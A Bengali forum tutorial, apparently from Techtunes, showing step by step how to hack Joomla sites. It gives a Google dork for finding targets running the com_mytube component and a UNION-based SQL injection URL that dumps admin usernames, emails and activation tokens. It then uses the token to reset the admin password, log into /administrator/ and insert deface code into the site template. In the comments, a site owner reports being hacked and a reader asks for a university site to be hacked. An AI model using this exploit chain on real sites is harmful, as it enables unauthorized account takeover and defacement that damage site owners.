জুমলা সাইট হ্যাকিং । কিভাবে জুমলা ওয়েবসাইট হ্যাক করবেন

<——— MRN Is Hare ——–>

আমি MrNHaCkEr চলে আসলাম আপনাদের মাঝে ।।

আমি এবার দেখাব কিভাবে জুমলা সাইট হ্যাক করবেন ।। ইমেজ সহঃ

কথা না বারিয়ে দ্রুত কাজ সুরু করে দিয় ।

বিঃদ্রঃ দয়া করে আমার লিখা কোন কিছু খারাপ কাজে ব্যবহার করবেন না ।। আপনার কোন কিছুর জন্য আমি দায়ি থাকব না -><-

Finding Exploit and Target

প্রথমে নিচের Google Dork টা দিয়ে গুগল এ সার্চ দিনঃ

inurl:”option=com_mytube”

গুগল আপনাকে অনেক সাইট আর সন্ধান দিবে । একটাকে লক্ষ বানিয়ে নিন ।

নিচের মত হবে সাইটটির এড্রেস ;

http://targetsite.com/index.php?option=com_mytube&Itemid=88…

এবার সাইট এর URL এর সাথে নিচের URL টি পরিবর্তন করুন –>

/index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62–

এই রকম হবে ঃ

http://targetsite.com/index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62–

যদি আপনার টার্গেট সাইট টি  vulnerable হয় তাহলে নিচের মত দেখতে পাবেন পেজ টি তে –>

sanstitrecen জুমলা সাইট হ্যাকিং । কিভাবে জুমলা ওয়েবসাইটস হ্যাক করবেন

উপরে ইমেজ এ username, email and activation code <———-

এই পেজ টি ওপেন রেখে অন্য একতা ট্যাব ওপেন করুন –>

Admin password reset

এবার সুধু সাইট টির এড্রেস টা নিয়ের নিচের মত URL এর শেষে নিচের URL টি পরিবর্তন করুনঃ —->

/index.php?option=com_user&view=reset

নিচের মতঃ ——>

http://www.targetsite.com/index.php?option=com_user&view=reset      <————-

This is standard Joomla query for password reset request

sanstitrely জুমলা সাইট হ্যাকিং । কিভাবে জুমলা ওয়েবসাইটস হ্যাক করবেন

এখানে আমরা উপরের যেই ইমেইল টা পেয়েসি সেই টা দিব —–>

এবার Submit করুন ।

এর পর Activation কোড টা Reset হয়ে যাবে । < যেই টা আমরা প্রথম ধাপ টা করে পেয়েসি >

প্রথম ট্যাব এ ফিরে আসুন যেই টা প্রথম ওপেন করে রেখে দিয়েসেন ।;

এবার পেজ টা একবার Refresh করুন ।

নতুন Activation code টা  কপি করে Token এর ঘরে দিন , ইউজার নেম <এ প্রথম ট্যাব থেকে পাওয়া ইউজার নেম পাওয়া > নাম টা দিন ।

এই রকম activation code দেখলে তাহলে অন্য সাইট খুজুন ->  $1$14411

Admin Login

যদি সব কিছু ঠিক থাকে তাহলে নিচের মত Password এর পেজ আসবে নতুন Password দিন ।

sanstitreda জুমলা সাইট হ্যাকিং । কিভাবে জুমলা ওয়েবসাইটস হ্যাক করবেন

তার পর নিচের URL টা সাইট টার সাথে লাগিয়ে দিন ।।

administrator/

এই রকম ঃ

http://www.targetsite.com/administrator/

sanstitreti জুমলা সাইট হ্যাকিং । কিভাবে জুমলা ওয়েবসাইটস হ্যাক করবেন

এবার ইউজার নেম এবং পাস দিয়ে লগ ইন  করুন ।। ওয়াও !! গ্রেট ।

এবার Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML

In Template HTML Editor insert your defaced code, click Apply, Save কাজ শেষ ।

বিদায় নিতে বাধ্য হলাম আরও কিছু লিখার ইচ্ছা ছিল পারলাম না ।।

সবার সুস্থ সুন্দর জীবন কামনা করি …। ।

MRN —>

 

Level 0

আমি MRN Hacker। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 12 বছর 4 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 21 টি টিউন ও 160 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

ধন্যবাদ ভাইয়া………। আমি ও এক জন হ্যাকার হতে চাই।।

Level 0

টিউনের জন্য অনেক সাধুবাদ…

Level New

nice post.thanks for share

Level 0

কয়েকটা সাইড এ ট্রাই করলাম কিন্তু কাজ হয় না.. 🙁

হ্যাক আর হাইজেক শুনলেই ভয় লাগে🙂

ফালতু পোস্ট! আপনি যদি এতই বড় হ্যাকার হয়ে থাকেন, দেখি Youtube.com কে হ্যাক করেন। অপেন চ্যালেঞ্জ!!!

    Level 0

    @ফাইয়াজ বিন সালাম: হাহাহহাহা !!!!@@@
    কোন কারনে ফালতু সেইটা বলে যুক্তি দেখালে আক্তা কথা সিল ।।
    আর আমার youtube কে হ্যাক করে কোন লাভ নেই ।।
    ওপেন চ্যালেঞ্জ ? হাহাহ
    যাই হক মন্তব্য পেয়েই খুসি হলাম ।।
    ধন্যবাদ ভাই।।

ফাইয়াজ বিন সালাম wrote ফালতু পোস্ট!

Level 0

@MRN Hacker

ভাইয়া, আপনার post টি অনেক সুন্দর হইছে। আমি এই sector এ নতুন। দয়া করে একটু বুঝিয়ে বলবেন কি GOOGLE DORKS and VULNERABLE site মানে কি?

Level 0

Vi ami apnake khub like kori. Maj dike apni koi gecilen?

Level 0

হা MRN HACKER ভাই, apona k dhonnobad, ami anondito ebong dokhhito , ei jonno j aponi amar new site http://www.kendrabindo.com hack koresen. amar site ta ekdom new, matro kaj soro koresi, ekhono site design e kora hoy ni, othocho aponi ATACK korlen ama k, Ami Khosi hobo aponi Jodi amar Ei Site er bepare kotha balen 01558541325 eta amar number.

    Level 0

    @saidbai: যে বা যারা ( mrn ) হ্যাক করেসে তাদের Trace করে দোষারোপ করেন ।।

Level 0

“www.ignou.ac.in” ei website haque kore amake pass korite parben ami ei university website tar chatro………